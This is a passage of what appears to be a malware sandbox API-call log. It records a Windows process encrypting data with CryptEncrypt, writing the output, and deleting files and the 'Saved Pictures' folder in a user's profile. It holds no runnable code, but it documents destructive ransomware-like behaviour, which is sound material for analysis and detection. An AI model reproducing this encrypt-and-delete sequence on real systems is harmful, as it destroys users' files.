pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0211.283] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0211.283] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.283] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.283] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab350, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.283] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71d88*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71d88*, pdwDataLen=0x8cef60*=0x8) returned 1 [0211.283] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.284] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.284] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.284] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.284] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.284] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.284] WriteFile (in: hFile=0x520, lpBuffer=0x2a71be8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71be8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0211.285] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0211.285] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0211.285] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.285] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaf30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.285] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0211.285] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.285] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.285] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.285] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.286] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.287] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.287] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.287] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.287] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.287] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.287] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.287] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.287] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.287] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.287] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.287] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.287] CryptReleaseContext (hProv=0xa7c5d8, dwFlags=0x0) returned 1 [0211.287] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.287] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.287] FreeLibrary (hLibModule=0x76390000) returned 1 [0211.287] CloseHandle (hObject=0x520) returned 1 [0211.288] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.288] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.288] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Saved Pictures", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpFilePart=0x8cedf4*="Saved Pictures") returned 0x27 [0211.288] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures")) returned 0x11 [0211.289] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e2238 [0211.289] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0211.289] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0211.289] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\desktop.ini")) returned 1 [0211.290] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0211.290] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0211.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.291] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.291] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0211.292] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaa80 [0211.293] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Saved Pictures", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpFilePart=0x8cf650*="Saved Pictures") returned 0x27 [0211.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaa80 | out: hHeap=0x2af0000) returned 1 [0211.293] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures")) returned 0x11 [0211.294] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 